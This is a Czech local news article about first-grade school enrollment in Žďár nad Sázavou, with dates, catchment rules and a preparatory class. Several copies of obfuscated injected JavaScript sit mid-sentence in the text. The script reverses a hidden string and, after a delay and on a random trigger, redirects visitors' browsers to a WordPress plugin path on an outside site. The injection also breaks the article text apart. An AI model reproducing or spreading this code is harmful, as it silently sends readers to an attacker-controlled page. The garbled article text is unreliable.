Rainbow page separator

Zápisy do žďárských prvních tříd se uskuteční 12. a 13. dubna

Neděle, 7. dubna 2019

Základní škola Komenského 6 Žďár nad Sázavou

Žďár nad Sázavou / Na pátek 12. dubna v době od 14 do 17 hodin a na sobotu 13. dubna od 9 do 11 hodin jsou naplánovány zápisy do prvních tříd žďárských základních škol. Informace o zápisu nastávajících prvňáčků budou zveřejněny také na vstupních dveřích budov základních škol a na jejich webových stránkách. Ve Žďáře si rodiče pro svoje dítě nemohou zvolit školu podle svého rozhodnutí, jelikož vyhláškou města jsou kvůli rovnoměrnému naplnění všech základních škol stanoveny spádové obvody pro zápis dětí do 1. tříd, a ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to podle jejich trvalého bydliště. Vedení radnice žádá rodiče, aby přidělené spádové obvody respek["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovali. Informace o jejich stanovení jsou zveřejněny na webu města. Ve Žďáře taktéž funguje přípravná třída pro děti v posledním roce před zahájením povinné školní docházky. Je určena těm, u nichž se předpokládá, že zařazení do přípravné třídy vyrovná jejich vývoj, a přednostně i předškolákům, jimž byl povolen odklad povinné školní docházky. Příští školní rok bude přípravná třída opět fungovat v základní škole v Komenského ulici 6 (3. ZŠ). O zařazování žáků do té["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to třídy rozhoduje ředitel školy na žádost zákonného zástupce dítěte a písemného doporučení příslušného poradenského zařízení.